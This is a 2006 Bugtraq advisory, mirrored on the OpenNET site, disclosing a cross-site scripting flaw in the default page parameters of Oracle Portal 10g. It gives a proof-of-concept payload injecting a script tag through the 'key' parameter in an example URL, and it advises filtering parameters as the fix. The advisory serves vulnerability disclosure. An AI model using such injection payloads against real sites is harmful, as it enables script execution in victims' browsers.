The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


XSS with default page parameter in Oracle Portal 10g


<< Previous INDEX Search src / Print Next >>
Date: 29 Dec 2006 03:07:27 -0000
From: duchaikhtn@gmail.com
To: bugtraq@securityfocus.com
Subject: XSS with default page parameter in Oracle Portal 10g
X-Virus-Scanned: antivirus-gw at tyumen.ru

XSS with default page parameter in Oracle Portal 10g
Discovered By: Ph&#7841;m &#272;&#7913;c H&#7843;i (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:

When programmers code with Oracle Portal, they may use page parameters supported by Oracle Portal.
By default, these parameters have the xss bug. If the programmers don't filter or process these parameters before using, 
the attacker maybe exploit via this xss bug.

Exploit : (tested Oracle Portal 10g 10.0.0.x)
For example, we have site : http://somesite.com used Oracle Portal 10g and this site is using key - page parameter(by default).
...key="><script>alert('xss_bug_found');</script>
http://somesite.com/portal/page?_pageid=<pageid>&_dad=portal&_schema=<schema>&key="><script>alert('xss_bug_found');</script>

Solution:

Filter or process all the page parameters.


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру